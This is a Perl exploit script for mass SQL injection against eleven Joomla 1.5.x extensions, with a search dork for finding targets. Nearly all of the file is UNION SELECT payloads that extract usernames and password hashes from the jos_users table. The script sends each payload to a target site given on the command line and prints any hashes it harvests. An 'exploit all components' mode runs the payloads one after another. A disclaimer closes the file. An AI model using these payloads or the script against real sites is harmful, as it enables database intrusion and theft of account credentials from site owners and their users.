#Exploit Title: Joomla 1.5.x Multi Component SQL Injector ()
#Exploit Author: D35m0nd142
#Date: 28/01/2013
#Google Dork: inurl:"com_..."
#!/usr/bin/perl
use IO::Socket::INET;
use LWP::UserAgent;
system("clear");
print "---------------------------------------------\n";
print " Joomla 1.5.x Multi Component SQL Injector \n";
print " Created by D35m0nd142 \n";
print "---------------------------------------------\n\n";
$target = $ARGV[0];
$component = $ARGV[1];
if($target eq '' || $component eq '')
{
print "Usage: ./exploit.pl <target> <component> \n";
print "-----------------------------------\n";
print " Available components : \n";
print " 1- com_alfurqan15x \n";
print " 2- com_jobprofile \n";
print " 3- com_question \n";
print " 4- com_joomloc \n";
print " 5- com_joomlub \n";
print " 6- com_manager \n";
print " 7- com_iproperty \n";
print " 8- com_jooproperty \n";
print " 9- com_digifolio \n";
print " 10- com_rdautos \n";
print " 11- com_ownbiblio \n";
print " 12- try to exploit all components \n";
print "-----------------------------------\n";
print " Example: ./exploit.pl http://www.site.com/spa/ 1 \n\n";
exit(1);
}
open(FILE, "> contents11.txt");
if($target !~ /http:\/\//)
{
$target = "http://$target";
}
sleep 1.5;
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
if($component == 1)
{
$host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
print " . . Exploiting com_alfurqan15x on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password \n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}
if($component == 2)
{
$host = $target . "index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--";
print " . . Exploiting com_jobprofile on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}
if($component == 3)
{
$host = $target . "/index.php/?option=com_question&catID=21' and+1=0 union all select # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20";
print " . . Exploiting com_question on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}
if($component == 4)
{
$host = $target . "/index.php?option=com_joomloc&controller=loc&view=loc&layout=loc&task=edit&cid[]=1&id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users";
print " . . Exploiting com_joomloc on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}
if($component == 5)
{
print " . . Exploiting com_joomlub on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20union%20all%20select%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host1 = $target . "/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host2 = $target . "/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host3 = $target . "/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2'%20and+1=0%20union%20all%20select%20#%20|%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host4= $target . "/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20UNION%20ALL%20SELECT%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
@hosts = ($host,$host1,$host2,$host3,$host4);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
sleep 1;
}
}
}
if($component == 6)
{
$host = $target . "/index.php?option=com_manager&view=flight&Itemid=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_manager on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}
if($component == 7)
{
$host = $target . "/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_iproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}
if($component == 8)
{
$host = $target . "/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+";
print " . . Exploiting com_jooproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}
if($component == 9)
{
$host = $target. "/index.php?option=com_digifolio&view=project&id=10/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/jos_users--";
print " . . Exploiting com_digifolio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}
if($component == 10)
{
$host = $target . "/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54";
print " . . Exploiting com_rdautos on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}
if($component == 11)
{
$host = $target. "/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--";
print " . . Exploiting com_ownbiblio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}
if($component == 12)
{
print " . . Trying to exploit all available components . . \n\n";
sleep 2;
$host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
print " . . Exploiting com_alfurqan15x on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password \n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
sleep 2;
$host = $target . "index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--";
print " . . Exploiting com_jobprofile on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
sleep 2;
$host = $target . "/index.php/?option=com_question&catID=21' and+1=0 union all select # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20";
print " . . Exploiting com_question on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
sleep 2;
$host = $target . "/index.php?option=com_joomloc&controller=loc&view=loc&layout=loc&task=edit&cid[]=1&id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users";
print " . . Exploiting com_joomloc on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
sleep 2;
print " . . Exploiting com_joomlub on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20union%20all%20select%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host1 = $target . "/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host2 = $target . "/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host3 = $target . "/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2'%20and+1=0%20union%20all%20select%20#%20|%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host4= $target . "/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20UNION%20ALL%20SELECT%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
@hosts = ($host,$host1,$host2,$host3,$host4);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
}
sleep 2;
$host = $target . "/index.php?option=com_manager&view=flight&Itemid=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_manager on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}
sleep 2;
$host = $target . "/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_iproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
sleep 2;
$host = $target . "/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+";
print " . . Exploiting com_jooproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
sleep 2;
$host = $target. "/index.php?option=com_digifolio&view=project&id=10/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/jos_users--";
print " . . Exploiting com_digifolio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
sleep 2;
$host = $target . "/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54";
print " . . Exploiting com_rdautos on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
sleep 2;
$host = $target. "/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--";
print " . . Exploiting com_ownbiblio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
sleep 2;
print "[+] Attack finished. \n\n";
}
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information